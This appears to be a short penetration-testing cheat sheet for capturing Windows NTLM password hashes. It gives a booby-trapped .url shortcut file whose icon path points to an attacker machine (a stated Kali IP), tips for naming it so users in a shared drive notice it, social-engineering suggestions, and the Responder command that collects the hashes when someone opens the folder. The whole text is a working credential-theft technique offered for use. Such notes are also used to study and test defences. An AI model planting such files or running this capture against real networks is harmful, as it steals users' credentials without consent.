Tips:
- Social engineering! Use:
- Microsoft Word
- Outlook/Email
- Get people to open a file or certain things to get a hash back to you in Responder
Create an intriguing file in shared drive:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.218.128\%USERNAME%.icon #Kali IP
IconIndex=1Important things when saving it:
- Needs @ or ~ and .url and in quotes
- Example: “@test.url”
Intriguing is:
- naming it relevant to the directory it’s in
Open Responder:
sudo responder -I eth0 -vWhen the user visits the folder, you get a hash dump
